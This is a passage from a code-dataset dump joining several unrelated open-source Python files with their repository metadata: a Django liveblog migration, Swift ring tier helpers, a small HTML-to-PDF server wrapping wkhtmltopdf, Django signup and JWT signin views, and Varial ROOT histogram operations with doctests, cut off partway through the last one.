on_delete=django.db.models.deletion.CASCADE,
),
),
("body", models.TextField(verbose_name="body")),
("publish", models.BooleanField(default=False, verbose_name="publish liveblog entry")),
(
"image",
filer.fields.image.FilerImageField(
related_name="djangocms_blog_liveblog_image",
on_delete=django.db.models.deletion.SET_NULL,
verbose_name="image",
blank=True,
to="filer.Image",
null=True,
),
),
(
"thumbnail",
models.ForeignKey(
related_name="djangocms_blog_liveblog_thumbnail",
on_delete=django.db.models.deletion.SET_NULL,
verbose_name="thumbnail size",
blank=True,
to="filer.ThumbnailOption",
null=True,
),
),
],
options={
"verbose_name": "liveblog entry",
"verbose_name_plural": "liveblog entries",
},
bases=("cms.cmsplugin",),
),
]
|
bsd-3-clause
| 3,167,827,842,490,844,700
| 33.881356
| 103
| 0.420797
| false
| 5.415789
| false
| false
| false
|
Mirantis/swift-encrypt
|
swift/common/ring/utils.py
|
1
|
2880
|
from collections import defaultdict
def tiers_for_dev(dev):
"""
Returns a tuple of tiers for a given device in ascending order by
length.
:returns: tuple of tiers
"""
t1 = dev['zone']
t2 = "{ip}:{port}".format(ip=dev.get('ip'), port=dev.get('port'))
t3 = dev['id']
return ((t1,),
(t1, t2),
(t1, t2, t3))
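# Example (illustrative device dict): the three tiers grow by one component each,
# zone, then zone+ip:port, then zone+ip:port+device id:
#     tiers_for_dev({'zone': 1, 'ip': '192.168.1.1', 'port': 6000, 'id': 0})
#     # -> ((1,), (1, '192.168.1.1:6000'), (1, '192.168.1.1:6000', 0))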
def build_tier_tree(devices):
"""
Construct the tier tree from the zone layout.
The tier tree is a dictionary that maps tiers to their child tiers.
A synthetic root node of () is generated so that there's one tree,
not a forest.
Example:
zone 1 -+---- 192.168.1.1:6000 -+---- device id 0
| |
| +---- device id 1
| |
| +---- device id 2
|
+---- 192.168.1.2:6000 -+---- device id 3
|
+---- device id 4
|
+---- device id 5
zone 2 -+---- 192.168.2.1:6000 -+---- device id 6
| |
| +---- device id 7
| |
| +---- device id 8
|
+---- 192.168.2.2:6000 -+---- device id 9
|
+---- device id 10
|
+---- device id 11
The tier tree would look like:
{
(): [(1,), (2,)],
(1,): [(1, 192.168.1.1:6000),
(1, 192.168.1.2:6000)],
(2,): [(2, 192.168.2.1:6000),
(2, 192.168.2.2:6000)],
(1, 192.168.1.1:6000): [(1, 192.168.1.1:6000, 0),
(1, 192.168.1.1:6000, 1),
(1, 192.168.1.1:6000, 2)],
(1, 192.168.1.2:6000): [(1, 192.168.1.2:6000, 3),
(1, 192.168.1.2:6000, 4),
(1, 192.168.1.2:6000, 5)],
(2, 192.168.2.1:6000): [(2, 192.168.2.1:6000, 6),
(2, 192.168.2.1:6000, 7),
(2, 192.168.2.1:6000, 8)],
(2, 192.168.2.2:6000): [(2, 192.168.2.2:6000, 9),
(2, 192.168.2.2:6000, 10),
(2, 192.168.2.2:6000, 11)],
}
:devices: device dicts from which to generate the tree
:returns: tier tree
"""
tier2children = defaultdict(set)
for dev in devices:
for tier in tiers_for_dev(dev):
if len(tier) > 1:
tier2children[tier[0:-1]].add(tier)
else:
tier2children[()].add(tier)
return tier2children
|
apache-2.0
| -1,470,004,698,661,708,500
| 31.359551
| 71
| 0.365625
| false
| 3.794466
| false
| false
| false
|
murdej/h2pws
|
h2pws.py
|
1
|
2618
|
import time
import BaseHTTPServer
from urlparse import urlparse, parse_qs
import subprocess
import base64
import qrcode
import qrcode.image.svg
import cStringIO
#1630-1800
HOST_NAME = 'localhost' # !!!REMEMBER TO CHANGE THIS!!!
PORT_NUMBER = 8000 # Maybe set this to 9000.
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write("<html><head><title></title></head>")
s.wfile.write("<body><p>Send html source by POST.</p>")
# s.wfile.write("<p>You accessed path: %s</p>" % s.path)
s.wfile.write("</body></html>")
def do_POST(s):
"""Respond to a POST request."""
s.send_response(200)
s.send_header("Content-type", "application/x-pdf")
s.end_headers()
# params
url_params = parse_qs(urlparse(s.path).query)
args = ["wkhtmltopdf"]
for n in [ 'orientation', 'page-size', 'margin-bottom', 'margin-left', 'margin-right', 'margin-top' ]:
if n in url_params:
args += [ '--' + n, url_params[n][0] ]
args += ["-", "-"]
print args
html = s.rfile.read(int(s.headers.getheader('content-length')))
# Replace "qr::xxxxxxxxxxxxxxxxx" to sql qr code
if "qr-to-svg" in url_params :
new_html = ''
pos = 0
while True:
begin_str = '"qr::'
pos_a = html.find(begin_str, pos)
if pos_a == -1: break
# copy text before, keeping the opening quote of the attribute value
new_html += html[pos:pos_a+1]
# extract src of QR code
pos_a += len(begin_str)
pos_b = html.find('"', pos_a + 1)
qr_src = html[pos_a:pos_b]
print "qr:src='" + qr_src + "'"
# new_html += '[[' + qr_src + ']]'
factory = qrcode.image.svg.SvgPathImage
img = qrcode.make(qr_src, image_factory=factory)
output = cStringIO.StringIO()
img.save(output)
svgb = 'data:image/svg+xml;base64,' + base64.b64encode(output.getvalue())
output.close()
                new_html += '"' + svgb  # restore the opening quote dropped by the slice above
pos = pos_b
new_html += html[pos:]
html = new_html
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(html)
p.stdin.close()
s.wfile.write(p.stdout.read())
p.wait()
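# Example client call (a sketch; host/port follow the constants above, and the
# query parameters map to wkhtmltopdf options as parsed in do_POST):
#   curl --data-binary @page.html \
#     "http://localhost:8000/?page-size=A4&orientation=Landscape" -o out.pdf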
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
|
gpl-2.0
| 4,676,818,734,918,425,000
| 26
| 104
| 0.637128
| false
| 2.8
| false
| false
| false
|
texib/bitcoin-zoo
|
member/views.py
|
1
|
3349
|
from django.shortcuts import render
from django.contrib.auth.models import User, Group
from django.contrib.auth import login
from django.contrib.auth import logout
from django.contrib.auth import authenticate
from django.http import HttpResponseRedirect
from rest_framework import viewsets
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from serializer import UserSerializer, GroupSerializer
from rest_framework import status
from rest_framework import parsers
from rest_framework import renderers
from rest_framework_jwt import utils
from rest_framework_jwt.authentication import JSONWebTokenAuthentication as jwt_auth
from rest_framework_jwt.serializers import JSONWebTokenSerializer
# userena
from userena import views
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
authentication_classes = (BasicAuthentication, )
queryset = User.objects.all()
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
def signup(request):
'''
    a simple override of the userena signup view
'''
return views.signup(request, success_url='/home/')
def signout(request):
'''
'''
return views.signout(request, template_name='home.html')
def signin(request):
'''
'''
# this is a little trick to hack the userena signin function
return views.signin(request, redirect_signin_function=lambda *arg: '/home/')
class testSignin(APIView):
'''
API View that receives a POST with a user's username and password.
Returns a JSON Web Token that can be used for authenticated requests.
'''
throttle_classes = ()
permission_classes = ()
authentication_classes = ()
parser_classes = (parsers.FormParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = JSONWebTokenSerializer
jwt = jwt_auth()
def post(self, request):
'''
        Known issue: a segmentation fault occurs if you log in, then log out
        and log in again.
'''
serializer = testSignin.serializer_class(data=request.DATA)
if serializer.is_valid():
payload = utils.jwt_decode_handler(serializer.object['token'])
user = self.jwt.authenticate_credentials(payload)
            # Below is a trick for authentication: Django's default
            # authenticate() needs a username and password, but the decoded
            # JWT payload does not contain a password.
user.backend = 'django.contrib.auth.backends.ModelBackend'
# user = authenticate(username=user, nopass=True)
if user is not None:
if user.is_active:
login(request, user)
return HttpResponseRedirect('/home/')
else:
raise Exception('user not active')
else:
raise Exception('not valid user')
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
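# A usage sketch for testSignin (the URL is hypothetical; the payload fields
# follow JSONWebTokenSerializer):
#   POST /api/signin/ {"username": "alice", "password": "secret"}
#   -> the serializer validates the credentials and issues a JWT; the view
#      decodes it, logs the user in via the session backend and redirects
#      to /home/.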
|
mit
| -4,012,741,038,384,615,400
| 30.299065
| 84
| 0.693341
| false
| 4.550272
| false
| false
| false
|
dnowatsc/Varial
|
varial/operations.py
|
1
|
23334
|
"""
Operations on wrappers
"""
import array
import __builtin__
import ctypes
import collections
import functools
from ROOT import THStack, TGraphAsymmErrors
import history
import wrappers
class OperationError(Exception): pass
class TooFewWrpsError(OperationError): pass
class TooManyWrpsError(OperationError): pass
class WrongInputError(OperationError): pass
class NoLumiMatchError(OperationError): pass
def iterableize(obj):
if isinstance(obj, collections.Iterable):
return obj
else:
return [obj]
def add_wrp_kws(func):
"""Pops 'wrp_kws' from given keywords and updates returned wrapper."""
@functools.wraps(func)
def catch_wrp_kws(*args, **kws):
wrp_kws = kws.pop('wrp_kws', {})
ret = func(*args, **kws)
ret.__dict__.update(wrp_kws)
return ret
return catch_wrp_kws
@add_wrp_kws
@history.track_history
def stack(wrps):
"""
Applies only to HistoWrappers. Returns StackWrapper.
Checks lumi to be equal among all wrappers.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1,4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 4.5)
>>> h2.Fill(1,3)
1
>>> h2.Fill(3,6)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=2.)
>>> w3 = stack([w1, w2])
>>> w3.histo.Integral()
13.0
>>> w3.lumi
2.0
"""
wrps = iterableize(wrps)
stk_wrp = None
lumi = 0.
info = None
sample = ""
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper): # histo check
raise WrongInputError(
"stack accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if not stk_wrp: # stack init
stk_wrp = THStack(wrp.name, wrp.title)
lumi = wrp.lumi
info = wrp.all_info()
sample = wrp.sample
elif lumi != wrp.lumi: # lumi check
raise NoLumiMatchError(
"stack needs lumis to match. (%f != %f)" % (lumi, wrp.lumi)
)
if sample != wrp.sample: # add to stack
sample = ""
stk_wrp.Add(wrp.histo)
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
if not sample:
del info["sample"]
return wrappers.StackWrapper(stk_wrp, **info)
@add_wrp_kws
@history.track_history
def sum(wrps):
"""
Applies only to HistoWrappers. Returns HistoWrapper. Adds lumi up.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 4.5)
>>> h2.Fill(1)
1
>>> h2.Fill(3)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3.)
>>> w3 = sum([w1, w2])
>>> w3.histo.Integral()
3.0
>>> w3.lumi
5.0
"""
wrps = iterableize(wrps)
histo = None
lumi = 0.
info = None
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"sum accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if histo:
histo.Add(wrp.histo)
else:
histo = wrp.histo.Clone()
info = wrp.all_info()
lumi += wrp.lumi
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def diff(wrps):
"""
Applies only to HistoWrappers. Returns HistoWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1, 2)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 4.5)
>>> h2.Fill(1)
1
>>> w2 = wrappers.HistoWrapper(h2, lumi=3.)
>>> w3 = diff([w1, w2])
>>> w3.histo.Integral()
1.0
>>> w3.lumi
2.0
"""
wrps = iterableize(wrps)
histo = None
lumi = 0.
info = None
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"sum accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if histo:
histo.Add(wrp.histo, -1.)
else:
histo = wrp.histo.Clone()
info = wrp.all_info()
lumi = wrp.lumi
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def merge(wrps):
"""
Applies only to HistoWrapper. Returns HistoWrapper. Normalizes histos to lumi.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1,4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Fill(1,3)
1
>>> h2.Fill(2,6)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3.)
>>> w3 = merge([w1, w2])
>>> w3.histo.Integral()
5.0
>>> w3.lumi
1.0
"""
wrps = iterableize(wrps)
histo = None
info = None
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"merge accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if histo:
histo.Add(wrp.histo, 1. / wrp.lumi)
else:
histo = wrp.histo.Clone()
histo.Scale(1. / wrp.lumi)
info = wrp.all_info()
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = 1.
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def prod(wrps):
"""
Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2, history="w1")
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Fill(1)
1
>>> h2.Fill(2)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3)
>>> w3 = prod([w1, w2])
>>> w3.histo.Integral()
1.0
>>> w3.lumi
1.0
>>> w4 = wrappers.FloatWrapper(2.)
>>> w5 = prod([w1, w4])
>>> w5.histo.Integral()
2.0
"""
wrps = iterableize(wrps)
histo = None
info = None
lumi = 1.
for wrp in wrps:
if histo:
if isinstance(wrp, wrappers.HistoWrapper):
histo.Multiply(wrp.histo)
lumi = 1.
elif not isinstance(wrp, wrappers.FloatWrapper):
raise WrongInputError(
"prod accepts only HistoWrappers and FloatWrappers. wrp: "
+ str(wrp)
)
else:
histo.Scale(wrp.float)
lumi *= wrp.float
else:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"prod expects first argument to be of type HistoWrapper. wrp: "
+ str(wrp)
)
histo = wrp.histo.Clone()
info = wrp.all_info()
lumi = wrp.lumi
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def div(wrps):
"""
Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1,4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2)
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Fill(1,2)
1
>>> w2 = wrappers.HistoWrapper(h2, lumi=3)
>>> w3 = div([w1, w2])
>>> w3.histo.Integral()
2.0
>>> w4 = wrappers.FloatWrapper(2., history="w4")
>>> w5 = div([w1, w4])
>>> w5.histo.Integral()
2.0
"""
wrps = iterableize(wrps)
wrps = iter(wrps)
try:
nominator = next(wrps)
denominator = next(wrps)
except StopIteration:
raise TooFewWrpsError("div needs exactly two Wrappers.")
try:
wrps.next()
raise TooManyWrpsError("div needs exactly two Wrappers.")
except StopIteration:
pass
if not isinstance(nominator, wrappers.HistoWrapper):
raise WrongInputError(
"div needs nominator to be of type HistoWrapper. nominator: "
+ str(nominator)
)
if not (isinstance(denominator, wrappers.HistoWrapper) or
isinstance(denominator, wrappers.FloatWrapper)):
raise WrongInputError(
"div needs denominator to be of type HistoWrapper or FloatWrapper. denominator: "
+ str(denominator)
)
histo = nominator.histo.Clone()
lumi = nominator.lumi
if isinstance(denominator, wrappers.HistoWrapper):
histo.Divide(denominator.histo)
lumi = 1.
else:
histo.Scale(1. / denominator.float)
lumi /= denominator.float
info = nominator.all_info()
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def lumi(wrp):
"""
Applies to HistoWrapper. Returns FloatWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w2 = lumi(w1)
>>> w2.float
2.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"lumi needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
info = wrp.all_info()
return wrappers.FloatWrapper(wrp.lumi, **info)
@add_wrp_kws
@history.track_history
def norm_to_lumi(wrp):
"""
Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1, 4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w1.histo.Integral()
4.0
>>> w2 = norm_to_lumi(w1)
>>> w2.histo.Integral()
2.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"norm_to_lumi needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
histo.Scale(1. / wrp.lumi)
info = wrp.all_info()
info["lumi"] = 1.
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def norm_to_integral(wrp, use_bin_width=False):
"""
Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1, 4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w1.histo.Integral()
4.0
>>> w2 = norm_to_integral(w1)
>>> w2.histo.Integral()
1.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"norm_to_integral needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
option = "width" if use_bin_width else ""
integr = wrp.histo.Integral(option) or 1.
histo.Scale(1. / integr)
info = wrp.all_info()
info["lumi"] /= integr
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def copy(wrp):
"""
Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1, 4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w2=copy(w1)
>>> w2.histo.GetName()
'h1'
>>> w1.name == w2.name
True
>>> w1.histo.Integral() == w2.histo.Integral()
True
>>> w1.histo != w2.histo
True
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"copy needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
info = wrp.all_info()
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def rebin(wrp, bin_bounds, norm_by_bin_width=False):
"""
Applies to HistoWrapper. Returns Histowrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 4, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(2)
2
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w2=rebin(w1, [.5, 2.5, 4.5])
>>> w1.histo.GetNbinsX()
4
>>> w2.histo.GetNbinsX()
2
>>> w2.histo.GetBinContent(1)
2.0
>>> w2.histo.GetBinContent(2)
0.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"rebin needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
if len(bin_bounds) < 2:
raise OperationError(
"Number of bins < 2, must include at least one bin!"
)
bin_bounds = array.array("d", bin_bounds)
orig_bin_width = wrp.histo.GetBinWidth(1)
histo = wrp.histo.Rebin(
len(bin_bounds) - 1,
wrp.name,
bin_bounds
)
if norm_by_bin_width:
for i in xrange(histo.GetNbinsX()+1):
factor = histo.GetBinWidth(i) / orig_bin_width
histo.SetBinContent(i, histo.GetBinContent(i) / factor)
histo.SetBinError(i, histo.GetBinError(i) / factor)
info = wrp.all_info()
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def trim(wrp, left=True, right=True):
"""
Applies to HistoWrapper. Returns Histowrapper.
If left / right are set to values, these are applied. Otherwise empty bins
are cut off.
>>> from ROOT import TH1I
>>> w1 = wrappers.HistoWrapper(TH1I("h1", "", 10, .5, 10.5))
>>> w1.histo.Fill(5)
5
>>> w2 = trim(w1)
>>> w2.histo.GetNbinsX()
1
>>> w2.histo.GetXaxis().GetXmin()
4.5
>>> w2.histo.GetXaxis().GetXmax()
5.5
>>> w2 = trim(w1, 3.5, 7.5)
>>> w2.histo.GetNbinsX()
4
>>> w2.histo.GetXaxis().GetXmin()
3.5
>>> w2.histo.GetXaxis().GetXmax()
7.5
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"trim needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
# find left / right values if not given
histo = wrp.histo
axis = histo.GetXaxis()
n_bins = histo.GetNbinsX()
if type(left) == bool:
if left:
for i in xrange(n_bins+1):
if histo.GetBinContent(i):
left = axis.GetBinLowEdge(i)
break
else:
left = axis.GetXmin()
if type(right) == bool:
if right:
for i in xrange(n_bins+1, 0, -1):
if histo.GetBinContent(i):
right = axis.GetBinUpEdge(i)
break
else:
right = axis.GetXmax()
if left > right:
raise OperationError("bounds: left > right")
# create new bin_bounds
index = 0
while axis.GetBinLowEdge(index) < left:
index += 1
bin_bounds = [axis.GetBinLowEdge(index)]
while axis.GetBinUpEdge(index) <= right:
bin_bounds.append(axis.GetBinUpEdge(index))
index += 1
return rebin(wrp, bin_bounds)
@add_wrp_kws
@history.track_history
def mv_in(wrp, overflow=True, underflow=True):
"""
Moves under- and/or overflow bin into first/last bin.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(0)
-1
>>> h1.Fill(5,3)
-1
>>> w1 = wrappers.HistoWrapper(h1)
>>> w1.histo.Integral()
0.0
>>> w2 = mv_in(w1, False, False)
>>> w2.histo.Integral()
0.0
>>> w3 = mv_in(w1, True, False)
>>> w3.histo.Integral()
3.0
>>> w4 = mv_in(w1, False, True)
>>> w4.histo.Integral()
1.0
>>> w5 = mv_in(w1, True, True)
>>> w5.histo.Integral()
4.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"mv_bin needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
nbins = histo.GetNbinsX()
if underflow:
firstbin = histo.GetBinContent(0)
firstbin += histo.GetBinContent(1)
histo.SetBinContent(1, firstbin)
histo.SetBinContent(0, 0.)
if overflow:
lastbin = histo.GetBinContent(nbins + 1)
lastbin += histo.GetBinContent(nbins)
histo.SetBinContent(nbins, lastbin)
histo.SetBinContent(histo.GetNbinsX() + 1, 0.)
return wrappers.HistoWrapper(histo, **wrp.all_info())
@add_wrp_kws
@history.track_history
def integral(wrp, use_bin_width=False):
"""
Integral. Applies to HistoWrapper. Returns FloatWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(3,3)
2
>>> w1 = wrappers.HistoWrapper(h1)
>>> w2 = integral(w1)
>>> w2.float
4.0
>>> w3 = integral(w1, True)
>>> w3.float
8.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"int needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
option = "width" if use_bin_width else ""
info = wrp.all_info()
return wrappers.FloatWrapper(wrp.histo.Integral(option), **info)
@add_wrp_kws
@history.track_history
def int_l(wrp, use_bin_width=False):
"""
Left-sided integral. Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(3,2)
2
>>> w1 = wrappers.HistoWrapper(h1)
>>> w2 = int_l(w1)
>>> w2.histo.GetBinContent(1)
1.0
>>> w2.histo.GetBinContent(2)
3.0
>>> w2 = int_l(w1, True)
>>> w2.histo.GetBinContent(1)
2.0
>>> w2.histo.GetBinContent(2)
6.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"int_l needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
int_histo = wrp.histo.Clone()
option = "width" if use_bin_width else ""
for i in xrange(int_histo.GetNbinsX(), 0, -1):
error = ctypes.c_double()
value = int_histo.IntegralAndError(1, i, error, option)
int_histo.SetBinContent(i, value)
int_histo.SetBinError(i, error.value)
info = wrp.all_info()
return wrappers.HistoWrapper(int_histo, **info)
@add_wrp_kws
@history.track_history
def int_r(wrp, use_bin_width=False):
"""
    Right-sided integral. Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(3,2)
2
>>> w1 = wrappers.HistoWrapper(h1)
>>> w2 = int_r(w1)
>>> w2.histo.GetBinContent(1)
3.0
>>> w2.histo.GetBinContent(2)
2.0
>>> w2 = int_r(w1, True)
>>> w2.histo.GetBinContent(1)
6.0
>>> w2.histo.GetBinContent(2)
4.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"int_r needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
int_histo = wrp.histo.Clone()
option = "width" if use_bin_width else ""
n_bins = int_histo.GetNbinsX()
for i in xrange(1, 1 + n_bins):
error = ctypes.c_double()
value = int_histo.IntegralAndError(i, n_bins, error, option)
int_histo.SetBinContent(i, value)
int_histo.SetBinError(i, error.value)
info = wrp.all_info()
return wrappers.HistoWrapper(int_histo, **info)
@add_wrp_kws
@history.track_history
def chi2(wrps, x_min=0, x_max=0):
"""
Expects two Histowrappers. Returns FloatWrapper.
"""
wrps = iterableize(wrps)
wrps = iter(wrps)
try:
first, second = next(wrps), next(wrps)
except StopIteration:
raise TooFewWrpsError("chi2 needs exactly two HistoWrappers.")
try:
wrps.next()
raise TooManyWrpsError("chi2 needs exactly two HistoWrappers.")
except StopIteration:
pass
for w in (first, second):
if not isinstance(w, wrappers.HistoWrapper):
raise WrongInputError(
"chi2 needs type HistoWrapper. w: "
+ str(w)
)
if not first.histo.GetNbinsX() == second.histo.GetNbinsX():
raise WrongInputError(
"chi2 needs histos with same number of bins."
)
if not x_max:
x_max = int(first.histo.GetNbinsX() - 1)
def get_weight_for_bin(i):
val = (first.histo.GetBinContent(i+1)
- second.histo.GetBinContent(i+1))**2
err1 = first.histo.GetBinError(i+1)
err2 = second.histo.GetBinError(i+1)
if err1 and err2:
return val / (err1**2 + err2**2)
else:
return 0.
chi2_val = __builtin__.sum(
get_weight_for_bin(i)
for i in xrange(x_min, x_max)
)
info = second.all_info()
info.update(first.all_info())
return wrappers.FloatWrapper(
chi2_val,
**info
)
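# Usage sketch for chi2 (hypothetical wrappers with identical binning; x_min
# and x_max are 0-based bin indices with an exclusive upper bound, so the
# defaults cover all but the last bin):
#   chi2_wrp = chi2([w_data, w_mc])
#   chi2_wrp = chi2([w_data, w_mc], x_min=2, x_max=10)
#   print chi2_wrp.float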
@add_wrp_kws
@history.track_history
def eff(wrps, option=''):
"""
Applies to HistoWrappers only. Returns GraphWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1)
1
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2)
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Sumw2()
>>> h2.Fill(1)
1
>>> h2.Fill(1)
1
>>> h2.Fill(1)
1
>>> h2.Fill(2)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3)
>>> w3 = eff([w1, w2])
>>> w3.graph.GetN()
2
>>> hi = w3.graph.GetErrorYhigh(0)
>>> lo = w3.graph.GetErrorYlow(0)
>>> abs(hi - 0.277375360987) < 1e-10
True
>>> abs(lo - 0.414534706284) < 1e-10
True
"""
wrps = iterableize(wrps)
wrps = iter(wrps)
try:
nominator = next(wrps)
denominator = next(wrps)
except StopIteration:
raise TooFewWrpsError("eff needs exactly two Wrappers.")
try:
wrps.next()
raise TooManyWrpsError("eff needs exactly two Wrappers.")
except StopIteration:
pass
if not isinstance(nominator, wrappers.HistoWrapper):
raise WrongInputError(
"eff needs nominator to be of type HistoWrapper. nominator: "
+ str(nominator)
)
if not (isinstance(denominator, wrappers.HistoWrapper)):
raise WrongInputError(
"eff needs denominator to be of type HistoWrapper. denominator: "
+ str(denominator)
)
graph = TGraphAsymmErrors(nominator.histo, denominator.histo, option)
